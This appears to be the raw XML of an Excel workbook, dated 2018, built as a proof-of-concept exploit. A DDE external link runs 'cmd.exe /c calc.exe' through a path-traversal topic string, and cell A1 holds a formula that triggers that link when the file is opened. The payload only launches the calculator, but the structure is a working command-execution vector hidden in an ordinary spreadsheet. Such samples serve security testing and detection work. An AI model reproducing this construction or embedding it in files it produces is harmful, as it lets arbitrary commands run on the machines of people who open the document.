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 filterPrivacy="1" defaultThemeVersion="166925"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="24525" windowHeight="11835" xr2:uid="{0A94E78B-5B83-481A-B647-8C2BBD56FA89}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId2"/>
  </externalReferences>
  <calcPr calcId="171027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MSEXCEL" ddeTopic="\..\..\..\Windows\System32\cmd.exe /c calc.exe">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </dd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1699B-120C-46C3-BD6A-B95D19D4D8E4}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" t="e">
        <f>[1]!_xlbgnm.A1</f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2018-01-27T23:15:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-27T23:30:08Z</dcterms:modified>
</cp:coreProperties>
</file>